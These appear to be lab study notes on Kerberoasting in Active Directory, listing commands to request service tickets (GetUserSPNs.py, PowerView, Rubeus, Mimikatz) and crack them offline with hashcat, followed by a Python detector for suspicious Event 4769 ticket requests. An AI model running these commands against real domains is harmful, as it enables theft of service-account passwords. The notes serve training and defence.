Kerberoasting

Kerberoasting Overview

  • This attack targets domain accounts that have Service Principal Names (SPNs) registered.

    • Purpose of Service Principal Names (SPN) in Active Directory

      • SPNs are unique identifiers that Kerberos uses to map a service instance to the service account in whose context that service runs.

        • Domain accounts are often used to run services to overcome the network authentication limitations of built-in accounts such as NT AUTHORITY\LOCAL SERVICE.

Kerberoasting - Performing the Attack

  • Depending on your position in a network, this attack can be performed in multiple ways:

    • From a non-domain joined Linux host using valid domain user credentials.

    • From a domain-joined Linux host as root after retrieving the keytab file.

    • From a domain-joined Windows host authenticated as a domain user.

    • From a domain-joined Windows host with a shell in the context of a domain account.

    • As SYSTEM on a domain-joined Windows host.

    • From a non-domain joined Windows host using runas /netonly.

Kerberoasting - from Linux

Kerberoasting with GetUserSPNs.py

GetUserSPNs.py -dc-ip 172.16.5.5 INLANEFREIGHT.LOCAL/forend

Requesting all TGS Tickets

GetUserSPNs.py -dc-ip 172.16.5.5 INLANEFREIGHT.LOCAL/forend -request 

Requesting a Single TGS ticket

GetUserSPNs.py -dc-ip 172.16.5.5 INLANEFREIGHT.LOCAL/forend -request-user sqldev

Cracking the Ticket Offline with Hashcat

hashcat -m 13100 sqldev_tgs /usr/share/wordlists/rockyou.txt 
  • The recovered password is database!

Testing Authentication against a Domain Controller

sudo crackmapexec smb 172.16.5.5 -u sqldev -p database!

Kerberoasting - from Windows

Manual way

Enumerating SPNs with setspn.exe

setspn.exe -Q */*

Targeting a Single User

Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/DEV-PRE-SQL.inlanefreight.local:1433"
  • The Add-Type cmdlet is used to add a .NET Framework class to our PowerShell session, which can then be instantiated like any .NET Framework object.

  • The -AssemblyName parameter allows us to specify an assembly that contains the types we are interested in using.

  • System.IdentityModel is a namespace that contains different classes for building security token services.

  • We'll then use the New-Object cmdlet to create an instance of a .NET Framework object.

  • We'll use the KerberosRequestorSecurityToken class from the System.IdentityModel.Tokens namespace to create a security token, passing the SPN to the class so that a Kerberos TGS ticket for the target account is requested in our current logon session.

Retrieving All Tickets Using setspn.exe

setspn.exe -T INLANEFREIGHT.LOCAL -Q */* | Select-String '^CN' -Context 0,1 | % { New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $_.Context.PostContext[0].Trim() }

Extracting Tickets from Memory with Mimikatz

mimikatz # base64 /out:true
mimikatz # kerberos::list /export  
echo "<base64 blob>" | tr -d '\n' > encoded_file
cat encoded_file | base64 -d > sqldev.kirbi
kirbi2john.py sqldev.kirbi
sed 's/\$krb5tgs\$\(.*\):\(.*\)/\$krb5tgs\$23\$\*\1\*\$\2/' crack_file > sqldev_tgs_hashcat
hashcat -m 13100 sqldev_tgs_hashcat /usr/share/wordlists/rockyou.txt 

Automated / Tool Based Route

Using PowerView to Extract TGS Tickets

Import-Module .\PowerView.ps1
Get-DomainUser * -spn | select samaccountname

Using PowerView to Target a Specific User

Get-DomainUser -Identity sqldev | Get-DomainSPNTicket -Format Hashcat

Exporting All Tickets to a CSV File

Get-DomainUser * -SPN | Get-DomainSPNTicket -Format Hashcat | Export-Csv .\ilfreight_tgs.csv -NoTypeInformation

Using Rubeus

.\Rubeus.exe kerberoast /stats
.\Rubeus.exe kerberoast /ldapfilter:'admincount=1' /nowrap

Using the /tgtdeleg Flag

  • With the /tgtdeleg flag, the tool requests an RC4 ticket even when the account's supported encryption types are listed as AES 128/256.
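The RC4 behaviour above is also what makes this activity visible on the defender's side. As an added detection example (not part of the original notes), the following flags the two signals a domain controller's Event ID 4769 log exposes: RC4-HMAC (etype 0x17, the $krb5tgs$23$ format hashcat mode 13100 cracks) service tickets issued for user accounts, and a single principal pulling tickets for many distinct service accounts in a short window, as the "request all" commands do. The events, field names and thresholds are constructed assumptions, not real logs or a vendor schema.

```python
"""Flag Kerberoast-style TGS requests in constructed Windows 4769 events."""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample events (not real logs). Field names are assumptions that
# stand in for 4769's TargetUserName, ServiceName, TicketEncryptionType, IpAddress.
SAMPLE_4769 = [
    {"time": "2024-01-01T10:00:01", "user": "forend", "service": "sqldev", "etype": "0x17", "src": "172.16.5.25"},
    {"time": "2024-01-01T10:00:02", "user": "forend", "service": "backupjob", "etype": "0x17", "src": "172.16.5.25"},
    {"time": "2024-01-01T10:00:03", "user": "forend", "service": "svc_iis", "etype": "0x17", "src": "172.16.5.25"},
    {"time": "2024-01-01T10:00:04", "user": "forend", "service": "WS01$", "etype": "0x12", "src": "172.16.5.25"},
    {"time": "2024-01-01T10:05:00", "user": "jdoe", "service": "krbtgt", "etype": "0x12", "src": "172.16.5.40"},
    {"time": "2024-01-01T10:30:00", "user": "jdoe", "service": "svc_iis", "etype": "0x12", "src": "172.16.5.40"},
]

RC4_HMAC = "0x17"  # etype 23: the only ticket type the $krb5tgs$23$ cracking route consumes


def is_user_service_account(service: str) -> bool:
    """Machine accounts (trailing $) and krbtgt are routine ticket targets; skip them."""
    return not service.endswith("$") and service.lower() != "krbtgt"


def rc4_user_ticket_requests(events):
    """Return events where an RC4 service ticket was issued for a user service account."""
    return [e for e in events
            if e["etype"].lower() == RC4_HMAC and is_user_service_account(e["service"])]


def burst_requesters(events, window=timedelta(minutes=5), threshold=3):
    """Map requester -> distinct user service accounts it requested tickets for
    inside any single `window`, reported only once that set reaches `threshold`."""
    by_user = defaultdict(list)
    for e in events:
        if is_user_service_account(e["service"]):
            by_user[e["user"]].append((datetime.fromisoformat(e["time"]), e["service"]))
    flagged = {}
    for user, reqs in by_user.items():
        reqs.sort()
        for i, (start, _) in enumerate(reqs):  # window anchored at each request
            seen = {svc for t, svc in reqs[i:] if t - start <= window}
            if len(seen) >= threshold:
                flagged[user] = flagged.get(user, set()) | seen
    return flagged


if __name__ == "__main__":
    for e in rc4_user_ticket_requests(SAMPLE_4769):
        print(f"RC4 TGS for {e['service']} requested by {e['user']} from {e['src']}")
    for user, svcs in burst_requesters(SAMPLE_4769).items():
        print(f"{user} requested {len(svcs)} service accounts within 5 min: {sorted(svcs)}")
```

Accounts whose tickets legitimately come back as RC4 will appear here until they are moved to AES-only encryption types, so the RC4 list doubles as a worklist for hardening.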
